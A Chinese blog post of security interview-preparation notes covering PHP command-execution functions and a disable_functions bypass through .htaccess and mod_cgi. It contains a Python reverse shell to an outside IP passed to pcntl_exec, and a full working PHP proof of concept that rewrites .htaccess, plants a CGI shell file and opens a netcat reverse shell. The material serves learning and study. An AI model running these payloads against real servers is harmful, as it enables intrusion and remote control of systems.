<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />




  


  <link rel="alternate" href="/atom.xml" title="jianghuxia's blog" type="application/atom+xml" />






<meta name="description" content="ms准备的材料！！~-~！！！希望能过！！">
<meta property="og:type" content="article">
<meta property="og:title" content="360xamszb">
<meta property="og:url" content="https://jianghuxia.github.io/2019/04/15/360xamszb/index.html">
<meta property="og:site_name" content="jianghuxia&#39;s blog">
<meta property="og:description" content="ms准备的材料！！~-~！！！希望能过！！">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://jianghuxia.github.io/2019/04/15/360xamszb/1555310463355.png">
<meta property="og:image" content="https://jianghuxia.github.io/2019/04/15/360xamszb/1555311094496.png">
<meta property="og:image" content="https://jianghuxia.github.io/2019/04/15/360xamszb/1555311592153.png">
<meta property="og:image" content="https://jianghuxia.github.io/2019/04/15/360xamszb/1555311923116.png">
<meta property="og:image" content="https://jianghuxia.github.io/2019/04/15/360xamszb/15241160891897.png!small">
<meta property="og:updated_time" content="2019-04-15T14:06:13.256Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="360xamszb">
<meta name="twitter:description" content="ms准备的材料！！~-~！！！希望能过！！">
<meta name="twitter:image" content="https://jianghuxia.github.io/2019/04/15/360xamszb/1555310463355.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://jianghuxia.github.io/2019/04/15/360xamszb/"/>





  <title>360xamszb | jianghuxia's blog</title>
  








  
  <script type="text/javascript" color="0,0,255" opacity='0.5' zIndex="-1" count="10"  src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
  
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">jianghuxia's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Everyday very nice!</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://jianghuxia.github.io/2019/04/15/360xamszb/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="jianghuxia">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/person_image.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="jianghuxia's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">360xamszb</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-04-15T22:02:56+08:00">
                2019-04-15
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>ms准备的材料！！~-~！！！希望能过！！</p>
<a id="more"></a> 
<h4 id="1、PHP中命令执行的函数以及会出现的问题"><a href="#1、PHP中命令执行的函数以及会出现的问题" class="headerlink" title="1、PHP中命令执行的函数以及会出现的问题"></a><strong>1、PHP中命令执行的函数以及会出现的问题</strong></h4><h5 id="system"><a href="#system" class="headerlink" title="system()"></a>system()</h5><p>执行外部命令，并且显示输出</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">header(&apos;Content:text/html;charset=utf-8&apos;);</span><br><span class="line">echo &apos;&lt;pre&gt;&apos;;</span><br><span class="line"></span><br><span class="line">system(&apos;dir&apos;, $retval);</span><br><span class="line">// 打印更多信息</span><br><span class="line">echo &apos;</span><br><span class="line">&lt;/pre&gt;</span><br><span class="line">&lt;hr /&gt;Return value: &apos; . $retval;        //成功执行则返回0，反之1</span><br></pre></td></tr></table></figure>
<p><img src="/2019/04/15/360xamszb/1555310463355.png" alt="1555310463355"></p>
<h5 id="exec"><a href="#exec" class="headerlink" title="exec()"></a>exec()</h5><p>执行一个外部命令</p>
<p><img src="/2019/04/15/360xamszb/1555311094496.png" alt="1555311094496"></p>
<p>system和exec的区别在于system在执行系统外部命令时，直接将结果输出到浏览器，不需要使用 echo 或 return 来查看结果，如果执行命令成功则返回true，否则返回false。</p>
<h5 id="shell-exec"><a href="#shell-exec" class="headerlink" title="shell_exec()"></a>shell_exec()</h5><p>通过 shell 环境执行命令，并且将完整的输出以字符串的方式返回。</p>
<p>命令执行的输出。 如果执行过程中发生错误或者进程不产生输出，则返回 <strong>NULL</strong>，即无输出。</p>
<p><img src="/2019/04/15/360xamszb/1555311592153.png" alt="1555311592153"></p>
<h5 id="passthru"><a href="#passthru" class="headerlink" title="passthru()"></a><strong>passthru()</strong></h5><p>执行外部程序并且显示原始输出</p>
<p><img src="/2019/04/15/360xamszb/1555311923116.png" alt="1555311923116"></p>
<p>不需要使用 echo 或 return 来查看结果，不返回任何值，且其可以输出二进制，比如图像数据</p>
<h5 id="pcntl-exec"><a href="#pcntl-exec" class="headerlink" title="pcntl_exec()"></a>pcntl_exec()</h5><p>(PHP 4 &gt;= 4.2.0, PHP 5, PHP 7)</p>
<p>pcntl是linux下的一个扩展，可以支持php的多线程操作。<br>pcntl_exec函数的作用是在当前进程空间执行指定程序，版本要求：<code>PHP 4 &gt;= 4.2.0, PHP 5</code></p>
<p>在做渗透的时候被<code>d[isable_functions</code>](<a href="http://www.moonsec.com/tag/isable_functions)卡住不能[执行命令](http://www.moonsec.com/tag/%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4)是家常便饭，今天在一国外虚拟主机上又被卡了，但我在执行phpinfo();的时候眼前闪过–enable-pcntl。当时我就偷笑了，没啥好说的，我一直强调渗透要细心做人做事也一样。" target="_blank" rel="noopener">http://www.moonsec.com/tag/isable_functions)卡住不能[执行命令](http://www.moonsec.com/tag/%E6%89%A7%E8%A1%8C%E5%91%BD%E4%BB%A4)是家常便饭，今天在一国外虚拟主机上又被卡了，但我在执行phpinfo();的时候眼前闪过–enable-pcntl。当时我就偷笑了，没啥好说的，我一直强调渗透要细心做人做事也一样。</a></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> pcntl_exec(“/bin/bash”, <span class="keyword">array</span>(“/tmp/b4dboy.sh”));<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span>  pcntl_exec(<span class="string">"/usr/bin/python"</span>,<span class="keyword">array</span>(<span class="string">'-c'</span>, <span class="string">'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM,socket.SOL_TCP);s.connect(("132.232.75.90",9898));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'</span>));<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<h5 id="popen"><a href="#popen" class="headerlink" title="popen()"></a><strong>popen()</strong></h5><h5 id="proc-open"><a href="#proc-open" class="headerlink" title="proc_open()"></a><strong>proc_open</strong>()</h5><p><a href="https://blog.csdn.net/weixin_43999372/article/details/87925442" target="_blank" rel="noopener">PHP Webshell下绕过disable_function的方法</a></p>
<p><strong>2、PHP中系统执行的函数以及会出现的问题</strong></p>
<p><strong>3、变量覆盖问题</strong></p>
<p><strong>4、有没有审计到什么漏洞</strong></p>
<p><strong>5、问了一些漏洞的名字和问了下形成原因</strong></p>
<p><strong>6、渗透中常见的端口以及是什么应用</strong></p>
<p><strong>7、Ssrf中怎么拿shell、还有一些绕过方式</strong></p>
<p><strong>8、Xss的一些绕过方式，如果在href中可以用什么编码绕过以及网页渲染中他对不同编码的渲染前后顺序。</strong></p>
<p><strong>8、扫描器去重、扫描器的功能流程介绍。</strong></p>
<p><strong>9、平时在寝室怎么学习的</strong></p>
<p><strong>10、学习了多久，聊了下一些学习方式然后口头说暑假实习offer没什么问题。</strong></p>
<h2 id="htaccess：不止重定向"><a href="#htaccess：不止重定向" class="headerlink" title=".htaccess：不止重定向"></a>.htaccess：不止重定向</h2><p>大家对.htaccess文件一定不陌生，没错，在apache的WEB环境中，我们经常会使用.htaccess这个文件来确定某个目录下的URL重写规则，特别是一些开源的CMS或者框架当中经常会用到，比如著名的开源论坛discuz!，就可以通过.htaccess文件实现URL的静态化，大部分PHP框架，例如ThinkPHP和Laravel，在apache环境下会用.htaccess文件实现路由规则。但是如果.htaccess文件被攻击者修改的话，攻击者就可以利用apache的mod_cgi模块，直接绕过PHP的任何限制，来执行系统命令。</p>
<p>关于mode_cgi，可以参考apache的官方说明：<a href="http://man.chinaunix.net/newsoft/ApacheManual/mod/mod_cgi.html" target="_blank" rel="noopener">http://man.chinaunix.net/newsoft/ApacheManual/mod/mod_cgi.html</a>。</p>
<p>“任何具有mime类型application/x-httpd-cgi或者被 cgi-script处理器(Apache 1.1或以后版本)处理的文件将被作为CGI脚本对待并由服务器运行, 它的输出将被返回给客户端。通过两种途径使文件成为CGI脚本，或者文件具有已由 AddType指令定义的扩展名，或者文件位于 ScriptAlias目录中。”，这就表示，apache允许WEB服务器与可执行文件进行交互，这就意味着，你可以用C或者python编写WEB应用，听起来我们好像可以做任何apache权限用户能做的事情了，那么到底如何实现呢？</p>
<p>首先需要满足几个条件，第一，必须是apache环境，第二，mod_cgi已经启用（在我的环境下是默认启用的），第三，必须允许.htaccess文件，也就是说在httpd.conf中，要注意AllowOverride选项为All，而不是none，第四，必须有权限写.htaccess文件。其实这几个条件还是比较容易满足的，满足了以上的条件，就可以“搞事情”了。</p>
<p>在apache的配置中，有一个非常重要的指令，Options，Options指令是Apache配置文件中一个比较常见也比较重要的指令，Options指令可以在Apache服务器核心配置(server config)、虚拟主机配置(virtual host)、特定目录配置(directory)以及.htaccess文件中使用。Options指令的主要作用是控制特定目录将启用哪些服务器特性。关于Options指令后可以附加的特性选项的具体作用及含义，可以参考这篇文章：<a href="http://www.365mini.com/page/apache-options-directive.htm" target="_blank" rel="noopener">http://www.365mini.com/page/apache-options-directive.htm</a>，当然我们用到的就是ExecCGI选项，表示允许使用mod_cgi模块执行CGI脚本。除了Options，我们还要配合另外一个AddHandler指令来使用，如果你对AddHandler不太熟悉没关系，这么解释一下就容易理解多了：AddType我们肯定很熟悉，比如配置apache对PHP的支持的时候，经常会添加一行类似AddTypeapplication/x-httpd-php .php这样的配置，这其实是指定了文件扩展名和内容类型之间的映射关系，而AddHandler则是指定扩展名和处理程序之间的关系，也就是说，可以指定某个特定的扩展名的文件，如何来进行处理。</p>
<p>有了Options和AddHandler，我们就可以随便指定一个特定的文件扩展名以特定的程序来处理，这样思路就很清晰了：先把要执行的程序写入一个特定扩展名的文件里，然后修改.htaccess文件，通过Options指令允许使用mod_cgi模块执行CGI脚本，然后再让我们特定的扩展名以cgi-script进行处理，这样我们甚至可以反弹一个shell出来。</p>
<p>POC如下，附注释：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$cmd = &quot;nc -c&apos;/bin/bash&apos; 127.0.0.1 4444&quot;; //反弹一个shell出来，这里用本地的4444端口</span><br><span class="line">$shellfile =&quot;#!/bin/bash\n&quot;; //指定shell</span><br><span class="line">$shellfile .=&quot;echo -ne \&quot;Content-Type: text/html\\n\\n\&quot;\n&quot;; //需要指定这个header，否则会返回500</span><br><span class="line">$shellfile .=&quot;$cmd&quot;; </span><br><span class="line">functioncheckEnabled($text,$condition,$yes,$no) //this surely can be shorter</span><br><span class="line">&#123;</span><br><span class="line">    echo &quot;$text: &quot; . ($condition ?$yes : $no) . &quot;&lt;br&gt;\n&quot;;</span><br><span class="line">&#125;</span><br><span class="line">if(!isset($_GET[&apos;checked&apos;]))</span><br><span class="line">&#123;</span><br><span class="line">    @file_put_contents(&apos;.htaccess&apos;,&quot;\nSetEnv HTACCESS on&quot;, FILE_APPEND); </span><br><span class="line">    header(&apos;Location: &apos; . $_SERVER[&apos;PHP_SELF&apos;]. &apos;?checked=true&apos;); //执行环境的检查</span><br><span class="line">&#125;</span><br><span class="line">else</span><br><span class="line">&#123;</span><br><span class="line">    $modcgi = in_array(&apos;mod_cgi&apos;,apache_get_modules()); // 检测mod_cgi是否开启</span><br><span class="line">    $writable = is_writable(&apos;.&apos;); //检测当前目录是否可写</span><br><span class="line">    $htaccess = !empty($_SERVER[&apos;HTACCESS&apos;]);//检测是否启用了.htaccess</span><br><span class="line">        checkEnabled(&quot;Mod-Cgienabled&quot;,$modcgi,&quot;Yes&quot;,&quot;No&quot;);</span><br><span class="line">        checkEnabled(&quot;Iswritable&quot;,$writable,&quot;Yes&quot;,&quot;No&quot;);</span><br><span class="line">        checkEnabled(&quot;htaccessworking&quot;,$htaccess,&quot;Yes&quot;,&quot;No&quot;);</span><br><span class="line">    if(!($modcgi &amp;&amp; $writable&amp;&amp; $htaccess))</span><br><span class="line">    &#123;</span><br><span class="line">        echo &quot;Error. All of the above mustbe true for the script to work!&quot;; //必须满足所有条件</span><br><span class="line">    &#125;</span><br><span class="line">    else</span><br><span class="line">    &#123;</span><br><span class="line">       </span><br><span class="line"> checkEnabled(&quot;Backing </span><br><span class="line">up.htaccess&quot;,copy(&quot;.htaccess&quot;,&quot;.htaccess.bak&quot;),&quot;Suceeded!Saved in </span><br><span class="line">.htaccess.bak&quot;,&quot;Failed!&quot;); //备份一下原有.htaccess</span><br><span class="line">        </span><br><span class="line">checkEnabled(&quot;Write </span><br><span class="line">.htaccessfile&quot;,file_put_contents(&apos;.htaccess&apos;,&quot;Options </span><br><span class="line">+ExecCGI\nAddHandlercgi-script </span><br><span class="line">.dizzle&quot;),&quot;Succeeded!&quot;,&quot;Failed!&quot;);//.dizzle，我们的特定扩展名</span><br><span class="line">        checkEnabled(&quot;Write shellfile&quot;,file_put_contents(&apos;shell.dizzle&apos;,$shellfile),&quot;Succeeded!&quot;,&quot;Failed!&quot;);//写入文件</span><br><span class="line">        checkEnabled(&quot;Chmod777&quot;,chmod(&quot;shell.dizzle&quot;,0777),&quot;Succeeded!&quot;,&quot;Failed!&quot;);//给权限</span><br><span class="line">        echo &quot;Executing the script now.Check your listener &lt;img src = &apos;shell.dizzle&apos; style =&apos;display:none;&apos;&gt;&quot;; //调用</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>我们在本地开nc监听4444端口，然后在浏览器中打开这个页面，如果执行成功，将会反弹一个shell到4444端口：</p>
<p><a href="http://image.3001.net/images/20180419/15241160891897.png" target="_blank" rel="noopener"><img src="/2019/04/15/360xamszb/15241160891897.png!small" alt="3.png"></a></p>
<p>当访问POC的时候，成功反弹了一个shell到本地的4444端口，可以看到执行id命令后的回显。</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/03/20/serialize与unserialize/" rel="next" title="serialize与unserialize">
                <i class="fa fa-chevron-left"></i> serialize与unserialize
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/person_image.jpg"
                alt="jianghuxia" />
            
              <p class="site-author-name" itemprop="name">jianghuxia</p>
              <p class="site-description motion-element" itemprop="description">Stay Hungry. Stay Foolish.</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">21</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">标签</span>
                
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#1、PHP中命令执行的函数以及会出现的问题"><span class="nav-number">1.</span> <span class="nav-text">1、PHP中命令执行的函数以及会出现的问题</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#system"><span class="nav-number">1.1.</span> <span class="nav-text">system()</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#exec"><span class="nav-number">1.2.</span> <span class="nav-text">exec()</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#shell-exec"><span class="nav-number">1.3.</span> <span class="nav-text">shell_exec()</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#passthru"><span class="nav-number">1.4.</span> <span class="nav-text">passthru()</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#pcntl-exec"><span class="nav-number">1.5.</span> <span class="nav-text">pcntl_exec()</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#popen"><span class="nav-number">1.6.</span> <span class="nav-text">popen()</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#proc-open"><span class="nav-number">1.7.</span> <span class="nav-text">proc_open()</span></a></li></ol></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#htaccess：不止重定向"><span class="nav-number"></span> <span class="nav-text">.htaccess：不止重定向</span></a></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">jianghuxia</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
